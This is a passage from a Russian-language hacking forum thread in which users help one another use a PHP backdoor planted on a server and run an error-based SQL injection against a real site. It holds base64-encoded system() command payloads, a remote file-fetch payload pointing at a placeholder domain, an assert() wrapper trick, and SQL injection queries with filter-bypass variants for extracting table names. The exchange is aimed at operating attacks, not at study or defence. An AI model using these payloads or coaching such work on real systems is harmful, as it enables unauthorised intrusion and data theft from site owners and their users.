Старый 18.02.2013, 17:25   #2721
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

Пробуй script.php?param=system(base64_decode($_GET[test]));&test=J2xzIC1hbCc
Ereeee вне форума   Ответить с цитированием
Старый 18.02.2013, 17:33   #2722
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Нет, не работает. Даже system(base64_decode($_GET[test]));&test=bHMK не работает
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 18.02.2013, 17:53   #2723
www-data
 
Регистрация: 19.09.2012
Сообщений: 2
Репутация: 0
По умолчанию

Попробуй так file_get_contents($_GET[file])&file=http://domein.com/what_you_want.txt или лучше так
PHP код:
param=file_get_contents%28%24_GET%5Bfile%5D%29&file=http%3A//domein.com/what_you_want.txt 

Последний раз редактировалось www-data; 18.02.2013 в 17:57..
www-data вне форума   Ответить с цитированием
Старый 18.02.2013, 18:57   #2724
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Ни один вариант не работает
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 18.02.2013, 20:10   #2725
euro
 
Регистрация: 09.07.2010
Сообщений: 66
Репутация: 8
По умолчанию

copy,include
а php работает вообще ? может эвала нету давно)
euro вне форума   Ответить с цитированием
Старый 18.02.2013, 20:19   #2726
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Некоторые же команды работают, в т.ч. и простой phpinfo();

Боюсь, что ввел всех в заблуждение относительно методики создания бэкдора (описал по привычке стандартную схему). На самом деле код внедрен по способу, предложенному Белым Тигром здесь. Подозреваю, что именно здесь заключена проблема, но не знаю, как ее решить
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 18.02.2013, 20:46   #2727
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 354
Репутация: 105
По умолчанию

Кинь линк в пм что ли

UP: Странный очень eval там был, пришлось обернуть еще сверху assert. В пм ушло.

POST:

code=assert(base64_decode(c3lzdGVtKCdscyAtbGEnKTs) );exit;

Последний раз редактировалось b3; 18.02.2013 в 21:20..
b3 вне форума   Ответить с цитированием
Старый 19.02.2013, 06:10   #2728
_xhugo
 
Регистрация: 11.11.2010
Сообщений: 26
Репутация: 0
По умолчанию

нужна ваша помощь)

запрос
Код:
-1%' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY MID((SELECT table_name FROM information_schema.tables WHERE table_schema=0x68675f6462 Limit 0,1), FLOOR(RAND(0)*2), 64)) --
получаю
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 5SELECT ftm.subject, ftm.message, ft.title, ft.slug, ft.id, f.slug as forum_slug, fu.email, fu.signature, ftm.user_id, ftm.created_at as forum_created_at, fu.created_at as user_register, fu.post_count as user_post_count, fu.name, f.* FROM `forum_forum_topic_message` ftm
						LEFT JOIN `forum_forum_topic` ft ON ftm.`forum_topic_id`=ft.`id`
						LEFT JOIN `forum_forum` f ON ft.`forum_id`=f.`id`
						LEFT JOIN `forum_user` fu ON ftm.`user_id`=fu.`id`
						WHERE ftm.`subject` LIKE '%-1%' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY MID((SELECT table_name FROM information_schema.tables WHERE table_schema%'
как я понял что не нравится знак равно, т.к. пробовал не кодировать тоже самое на том же месте, можно ли обойти это?

Последний раз редактировалось _xhugo; 19.02.2013 в 06:40..
_xhugo вне форума   Ответить с цитированием
Старый 19.02.2013, 08:59   #2729
Белый Тигр
 
Аватар для Белый Тигр
 
Регистрация: 29.08.2010
Сообщений: 153
Репутация: 25
По умолчанию

Ошибка в самом конце итогового запроса
Цитата:
WHERE table_schema%'
Похоже что передаваемый тобою параметр обрезается до определённой длины и потом уже помещается в запрос.
Белый Тигр вне форума   Ответить с цитированием
Старый 19.02.2013, 12:03   #2730
cat1vo
 
Аватар для cat1vo
 
Регистрация: 08.10.2010
Сообщений: 38
Репутация: 5
По умолчанию

_xhugo
Недавно было тоже самое, ему как ты правильно понял не нравится знак равно, у меня срабатывали варианты:
Цитата:
WHERE table_schema!='information_schema'
WHERE table_schema LIKE ('%hg_db%')
WHERE table_schema IN ('hg_db')
З.Ы. Судя по названию базы данных я знаю даже, что это за сайт. Удивительно, что администрация не закрыла уязвимость, т.к. были проинформированы о ней!
cat1vo вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot